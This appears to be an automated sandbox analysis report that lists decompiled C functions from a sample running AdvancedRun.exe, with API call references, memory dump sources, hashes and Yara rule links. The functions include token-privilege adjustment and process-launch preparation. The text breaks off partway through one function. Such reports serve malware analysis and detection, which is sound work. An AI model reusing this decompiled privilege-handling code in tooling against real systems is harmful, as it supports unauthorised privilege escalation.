				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                                                                  0x0040ad8c
                                                                                                                                                                  0x0040ad93
                                                                                                                                                                  0x0040ad95
                                                                                                                                                                  0x0040ad9d
                                                                                                                                                                  0x0040ada5
                                                                                                                                                                  0x0040adb2
                                                                                                                                                                  0x0040adb2
                                                                                                                                                                  0x0040adb5
                                                                                                                                                                  0x0040adbf

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll,74EB48C0,?,00403CB8,00000000), ref: 0040AD9D
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                                                                  • String ID: shlwapi.dll
                                                                                                                                                                  • API String ID: 4092907564-3792422438
                                                                                                                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                                                                  0x00406597
                                                                                                                                                                  0x00406598
                                                                                                                                                                  0x004065a0
                                                                                                                                                                  0x004065aa
                                                                                                                                                                  0x004065ac
                                                                                                                                                                  0x004065ac
                                                                                                                                                                  0x004065bd

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                  0x0040ac59
                                                                                                                                                                  0x0040ac60
                                                                                                                                                                  0x0040ac68
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040ac75
                                                                                                                                                                  0x0040ac7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ac7b
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040ac80

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,0040855E,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040AC75
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                  • API String ID: 946536540-880857682
                                                                                                                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                                                                  0x00406670
                                                                                                                                                                  0x0040667a
                                                                                                                                                                  0x00406680
                                                                                                                                                                  0x00406686
                                                                                                                                                                  0x0040668b
                                                                                                                                                                  0x0040668d
                                                                                                                                                                  0x00406693
                                                                                                                                                                  0x00406699
                                                                                                                                                                  0x0040669f
                                                                                                                                                                  0x004066a9
                                                                                                                                                                  0x004066ac
                                                                                                                                                                  0x004066af
                                                                                                                                                                  0x004066b9
                                                                                                                                                                  0x004066c7
                                                                                                                                                                  0x004066d9
                                                                                                                                                                  0x004066c9
                                                                                                                                                                  0x004066c9
                                                                                                                                                                  0x004066cc
                                                                                                                                                                  0x004066cf
                                                                                                                                                                  0x004066d2
                                                                                                                                                                  0x004066d5
                                                                                                                                                                  0x004066d5
                                                                                                                                                                  0x004066db
                                                                                                                                                                  0x004066dd
                                                                                                                                                                  0x004066e0
                                                                                                                                                                  0x004066e8
                                                                                                                                                                  0x004066fa
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066ed
                                                                                                                                                                  0x004066f0
                                                                                                                                                                  0x004066f3
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066fc
                                                                                                                                                                  0x004066fe
                                                                                                                                                                  0x00406701
                                                                                                                                                                  0x00406709
                                                                                                                                                                  0x0040671b
                                                                                                                                                                  0x0040670b
                                                                                                                                                                  0x0040670b
                                                                                                                                                                  0x0040670e
                                                                                                                                                                  0x00406711
                                                                                                                                                                  0x00406714
                                                                                                                                                                  0x00406717
                                                                                                                                                                  0x00406717
                                                                                                                                                                  0x0040671d
                                                                                                                                                                  0x0040671f
                                                                                                                                                                  0x00406722
                                                                                                                                                                  0x0040672a
                                                                                                                                                                  0x0040673c
                                                                                                                                                                  0x0040672c
                                                                                                                                                                  0x0040672c
                                                                                                                                                                  0x0040672f
                                                                                                                                                                  0x00406732
                                                                                                                                                                  0x00406735
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x0040673f
                                                                                                                                                                  0x00406745

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                                                                  0x004054ea
                                                                                                                                                                  0x004054ec
                                                                                                                                                                  0x004054f1
                                                                                                                                                                  0x004054f4
                                                                                                                                                                  0x004054f7
                                                                                                                                                                  0x004054fa
                                                                                                                                                                  0x004054fe
                                                                                                                                                                  0x00405501
                                                                                                                                                                  0x00405505
                                                                                                                                                                  0x00405508
                                                                                                                                                                  0x0040550b
                                                                                                                                                                  0x0040551b
                                                                                                                                                                  0x0040550d
                                                                                                                                                                  0x0040550f
                                                                                                                                                                  0x0040550f
                                                                                                                                                                  0x00405521
                                                                                                                                                                  0x00405527
                                                                                                                                                                  0x0040552b
                                                                                                                                                                  0x0040552e
                                                                                                                                                                  0x0040553f
                                                                                                                                                                  0x00405530
                                                                                                                                                                  0x00405532
                                                                                                                                                                  0x00405532
                                                                                                                                                                  0x00405556
                                                                                                                                                                  0x00405561
                                                                                                                                                                  0x0040556e
                                                                                                                                                                  0x00405571
                                                                                                                                                                  0x00405578
                                                                                                                                                                  0x0040557e

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                                                                    • Part of subcall function 00404951: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 00404985
                                                                                                                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405556
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                                                                  0x00405adf
                                                                                                                                                                  0x00405ae6
                                                                                                                                                                  0x00405af5
                                                                                                                                                                  0x00405af6
                                                                                                                                                                  0x00405afb
                                                                                                                                                                  0x00405b00
                                                                                                                                                                  0x00405b0a
                                                                                                                                                                  0x00405b18
                                                                                                                                                                  0x00405b19
                                                                                                                                                                  0x00405b1e
                                                                                                                                                                  0x00405b2c
                                                                                                                                                                  0x00405b2d
                                                                                                                                                                  0x00405b36
                                                                                                                                                                  0x00405b37
                                                                                                                                                                  0x00405b3c
                                                                                                                                                                  0x00405b4a
                                                                                                                                                                  0x00405b4b
                                                                                                                                                                  0x00405b54
                                                                                                                                                                  0x00405b55
                                                                                                                                                                  0x00405b5a
                                                                                                                                                                  0x00405b68
                                                                                                                                                                  0x00405b69
                                                                                                                                                                  0x00405b72
                                                                                                                                                                  0x00405b73
                                                                                                                                                                  0x00405b7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405b7b
                                                                                                                                                                  0x00405b80

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Analysis Process: AdvancedRun.exe PID: 6268 Parent PID: 5380 AdvancedRun.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                                                                  0x00408fc9
                                                                                                                                                                  0x00408fd0
                                                                                                                                                                  0x00408fe8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408fea
                                                                                                                                                                  0x00408ff4
                                                                                                                                                                  0x00409001
                                                                                                                                                                  0x00409003
                                                                                                                                                                  0x0040900c
                                                                                                                                                                  0x0040900e
                                                                                                                                                                  0x00409010
                                                                                                                                                                  0x0040901a
                                                                                                                                                                  0x0040901a
                                                                                                                                                                  0x00409010
                                                                                                                                                                  0x0040901f
                                                                                                                                                                  0x00409026
                                                                                                                                                                  0x0040902d
                                                                                                                                                                  0x00409030
                                                                                                                                                                  0x00409035
                                                                                                                                                                  0x00409037
                                                                                                                                                                  0x00409040
                                                                                                                                                                  0x00409042
                                                                                                                                                                  0x00409044
                                                                                                                                                                  0x00409051
                                                                                                                                                                  0x00409051
                                                                                                                                                                  0x00409044
                                                                                                                                                                  0x00409053
                                                                                                                                                                  0x0040905e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                  • API String ID: 616250965-1253513912
                                                                                                                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
